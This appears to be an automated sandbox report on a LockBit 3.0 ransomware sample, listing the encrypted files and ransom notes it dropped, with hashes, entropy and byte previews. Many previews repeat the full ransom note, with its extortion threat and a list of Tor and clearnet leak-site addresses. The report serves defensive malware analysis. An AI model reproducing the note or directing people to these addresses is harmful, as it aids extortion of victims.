                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\Settings\settings.dat.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):8431
                Entropy (8bit):7.979235853564095
                Encrypted:false
                SSDEEP:192:Isc0gXiWjWYvl/EUPWp+dyNzHSctLeQ7fmn0wlVCl7o:Isc0ojZvl/Ei7o3tLJmn0KCO
                MD5:B0E21E1116D192F3C609E298C0A9EB58
                SHA1:1B58BEFAED37DE80CD3A9FB9D9DE090102AF34E3
                SHA-256:A325F76C77197616CAC0E5A9B48F501DD9894DE95EAB143C6FF55DEC18FD603C
                SHA-512:3D3DFC84CA16C3A2F01DE0705FD0C4761FA946FE742A7F6B6CB23AAEDEAA604729619605B647C818DEEEF6BBD420AD4197D3AE2961381B904CE9FAEF7A82190C
                Malicious:false
                Preview:.....7.l....g.......$...'L.u.N!....bS.+.....J...cV.I..<.g5C....4......587oR.......DO.IB.R...9...9.k.qm?....G..;'U...+.i...;...Wd.....2ZD....Xiz..r..$......Z.J%.U...?..Iq.r.V.o...4..&.k2.'...$....\...{.k..S...G ....5...8....^...05+,..&.......Iy..kP.4G.9Q7.MI..3.Yd..GBW...i...fvJ.t.R...F..1.m.+{....!...4..&..,..=......?._..Jn .,Od.,.......s.G'Z..tHy..".!..^....4,Q.0.5s{E..^..8du...Q\z.&.S........&S.......Y.7.GP...!s.y.?.<..=8. .`..VeK.!...vM...|x..`C;r...:.zu....F.DAa./..O^...*|.m.y.zpW..B....T.J...m.R~....|_.........-...v.~.X.t...o.Oc....#......|%...H.<X.q.p.m.B?5......@\$/......f...44..BBd)4p...mJ.X-.L..p..X a.65.e..&u...o.......8..Q....vK7....-o..^.vq..}..R....y.@M5.........:.@.t>J.N.MZ.Nx.CcE!*..!.U=..n...66..@./r.*..8..X=.9D..q%Z.`a.....dB.l.9.;F'..;=.......v..y#y...S...B".%..2.....p...I.........;.8...+].....a...!>.O.J&Q...4\4....:..i..@.Q....!2.........|...nB.B@r."...3~...;w.{.?%......k.e.Tw`.E./..1..{..p..1.PY...&n.d..H&....pO

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\SystemAppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\TempState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\AC\Temp\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\AC\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\AppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalCache\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\MediaDb.v1.sqlite-shm.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):33023
                Entropy (8bit):7.994837400449685
                Encrypted:true
                SSDEEP:768:U9jIbqdkSf7AEAIy06E8GkXURwc8uDsyiGzfTNj:2OSjsE6WkXURGfc
                MD5:1BB9430D90FB916328ECD911CEA3EF3D
                SHA1:A3A53EB08143B970CFF09731B0BB2911EE7C1BD6
                SHA-256:FA6A7D8BFA29E290C212C4B34ADF744EB6013CA93DAA7DB7BD10D1250B04A494
                SHA-512:A878223354D6917C4FB2A1FAF44C0C770BB5FBF5EA808E63E867CB5FE94010340C11EA8CF9F63009148307DD5FEFB67C9D4C38BC4AEEC1D0C6D9AA87EE3C4526
                Malicious:true
                Preview:b....X/.b-/$..Eob.}.u..7..B.....t.K.m.....\.k....Oh...>.{-.GQ/k....L4..1..N...z..VKzHD8C../._.|....I.U..v.......-..rz.......Es|.+.D45...KIDs.:i..........|.T`..N....p\D..2..C.BM....Vq...z.}.S...n..e..L~X..#...<B>........\Bp.z....j.j....4..E..e]0.5. ....w5.n..K....g....v...@A..T(Y/....h...:.v..x.2&.:_.L..)p..R.x..,*^..3.`G..!...\..Z.?..LG.w..~.....AM..K..\S....C.'~p....GX...2.b.r..;:...32.}.'...W.t.l..W_..iA~...!....i....z.).?P.<@2.....{..i..<]..M.{L=....aT.*.R..H....~...hS..^..*wat....Q...H{.....T..r.AR.~..UMfv.-...u. ....]K..#D0..?..R......s.0/...4..../f.....x......}.O.......O.g. ..8J..f{..c.2.x9b.x...h....o....d....z.\.:Sl.K.../U,.-.<.1W..TLh..1....w........9.#..G........}..H..e^..sW8.DQX~dWe......P.i,..B6 s7..q..w...r.S%V..v.E...h...N.F6....E0).!Na.J..;.D..]--R.C3 .y......../NB..(y...<. fq............2..0.^...-.."L.O....BY....e.n.r....CU`.'.)....L..u$.../\eZ~TS-..Gh.\[#o!..&.V9..).....+|.G..-...<...6P.Hx.Y..m..(.......K..

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\MediaDb.v1.sqlite-wal.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):746006
                Entropy (8bit):6.6074310811493095
                Encrypted:false
                SSDEEP:12288:1YUqoSO+Yp0jgRuwrvb3o0VMGmHNC89mY4RAE5bG5P:Mo7mcrvbYKZ6CQWRA5P
                MD5:798FFBCAF4FF300E8B8A3A88E5194024
                SHA1:A634530D72750607BDFBFC10CB04734E2C0D6E99
                SHA-256:7B73FE53B75A35CE3B96DE728A2F3C605346454DEDA0811BCE62567EA2B42BB0
                SHA-512:D9BA508A2C494139EE0F43FF1B0BFB8D670E3BA367183ECABC69079EF67F58CB93500BA83DC1C6DB74D7AA60C332B78B51B61CC910BF01B534ABBC60389CC972
                Malicious:false
                Preview:..9].l.z....*.9.g......=.:F.. ..s.Zy.+.......k..4W.s.......{t.......}@.....t.%.}.c...?`x...8.\.....lX.....)..OK.....O..:5.Q..c....9I L......s..o.$....r....B.j._....pOJ.H..9..1...o~..*.w....SW.....S..W..._..u.l..Z..#j*.....|b......P.}..r....-Fw.|.m7....v.1K0.y...]...B...S..J...R...H0(=C..R.N..^tB..y9D...8"i.A..9..U..I]..t.dc.=?...2@..L!...~..A....u;...L...f......].h}..w.4.!......X}.S.......O.'~sp.alnG....}.c`#G.X!V-.,.6B.bH..y..fi.4.B..z..l.G..:.[.t../;..M.6.....6../H.'.g^.yq.`.wo...[...Ia'...f..GK..*.S..j....H.C.....f\.0.....D.@.........Y...X}...7a.....SRtUD.....#.{..F<.l..|T....K.f...lW.E.h.!.q_...7_.D...X&..=4...D1.P..v:.m........tmY..fM.U.......6.P.g.'..JEt.o8x.a....F...c....F .Y.ss.z....iIe..h.....o.C.N..X..@]w..,...W*D..n...=EX.0..t..%Q.h*......w}.. 8`.X...u..ID.>...........^..OH..D.....3@.u9.M.....#........Z.}..E.Ai.K....Mh.^x.......O.1T.~.Im.ye~.-.}.....HI...................u..N... ...r...u..#c..V y.......S:.)dG.K.JT.Wl..Y

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\MediaDb.v1.sqlite.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):4345
                Entropy (8bit):7.960054630961462
                Encrypted:false
                SSDEEP:96:myKJvj/Xby1wKcv8wxJlS/eby+aaQegg4QzgDPWEyAoi2GHezR:mfvj/awjv3Sm++NQuJ77io
                MD5:D0EF7B2594F49A6E75A18D5C33205466
                SHA1:C86D4294751A56F9D8917D325AF52DCDA4651E29
                SHA-256:D8C871109840D307DC7BC5C48831FC9F91F1D5AE084C475B0D132BBD895EEC96
                SHA-512:E1EF199676A772891356964A082D97FB98A339B01B0E9E07484F2A630F72D387249633CC4E04355C97E44AB3F7A073E0D5B444C1EAAEACED227D69A58A47AB5E
                Malicious:false
                Preview:wD..Zq..I.g*..l].%h.%.wJ..V5N2R.......=7..tL.yY3....0.tj.^..2a.uz$....y.Pf.....4=W.Q.,..`.....J..]..x.QOI)y....x...-Y...sh....*..*..O\H.nr.S.o...T..6..3..M.f..R).l..\.h[`.3[.................y]E..I.r.H.$.VX.0,.zjNX.....O...IBfEC..n.k.*...>&...R.N......q...J....bY.y...Ok.f+....;br;...5.`...K.J....v..2~..L..N..m..."...q...m.f0D..:"...}..!..q...P5..%.J..E..9..........b....wIC^....&,....E......K..U..N(.G.J.....i!...w{~.+.F...~k...O...z:..(G.h..&.......1.<...l.t:..x.......W.5A4.........A.....9Ax........;.@b.F.tx..".|....t.8.@9..P..Cn.....].I.t...EL..:......V....V.;B..a.O..w.......+....{..H\....`L..9..}..>......Rp.+$..U{....b+C..{O.U8..D.q.^.q...B[`.zl..uj.._.......-*...4.~.+p......3&K#.K.D.E.)..1..R.F.l..y.N.9....3...%zg2,..!..;..I....x.V...U.M...7...-/....Y..p........`.u3.ki&.M..%Z.*.........(K.y......X%!..4=-$&..{K.._~.....T.......g.@..*Q .Q..>.a.v..!q..smN...o..?.v...3...4.d...r4...z...e..O.9....7DG...{..i..K..$..

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\PhotosAppTracing_startedInBGMode.etl.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):65813
                Entropy (8bit):7.997166234532177
                Encrypted:true
                SSDEEP:1536:cOzBMmlPNojnm8buM3S+Rlt32YB18waBj5GqW7HbN4x:HBd1ojnHbucPltGYBfaBpKba
                MD5:D1D957AD0A887DA5FFDD5A5B9FE335AA
                SHA1:AC806A8640CAF6339AF15B2F6E8C5B016DAFEB8E
                SHA-256:908EF1AACEEC1FF9090301E4E266FE46120FF44D731D0DA80E3C08184C65F7F5
                SHA-512:DD9DED2E1A5441EF66FE527750304DEED85F90F20391249B75DBFD99BEFFC88DE9C4112BF04F6676009F4B270B88A18DBD28F43FDCF49A4F266652A639FCD66F
                Malicious:true
                Preview:M.78...Z..i..D$P.88./.q.<.>.J.Q.$as.f.t..T...q..!....W..q.7%/.*.Z.!...1....x.KK.T.......XR..n.lY...i#.*.^...;'..{.8..;I8W?..........|.p....9<>.u..k....2{..Q.{.z{..(..m/...F:.5(...V.py.\FD..e;.}.x(..........z...\.."]+....|..]...%...h..z.,V@...T..g..llK.'Ke....:x..<n..9.FW...Fe............XS....;;...v.n..I..r.{G.o.ueA.#."bJ=.1l...s...Li.$.PLT..).;|........^.........!??........Q..D`..`..EN@_...Sn*../....Q.6..CLe......x.t...K(.......mz\......S/_d,.p...hXa...mf/._....#...|.p.[V.Xb....k..U. %.....{w.".Y.f.H.;..cl...4%.W,T..l...S~3....v^....s..=.R..~.GGV.k1w.......>..t3...b.gp.K..=...R.L.t...K...E|xT...W...7......X......9...2...H..ChM.Q5.._O..;...3`.,...;....f&.......K..s;..h8...7.J......T.^..........P...j.V@...Y.$9...vC.........e.9....x.@x]'..f.#..[...U.|w...$.kB..b.(.....b#.#..Gky@J.t..i`..S..w....E@bNo...b.w..>.U.`..R...u...).....o}N.b{,A..U......m...R..b...DJ$..V..A......|....m?.`..8K.|t....Q.Y2.{...D-...B...,_...L..&).?.!....V.Z; .I.I..,..

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\RoamingState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
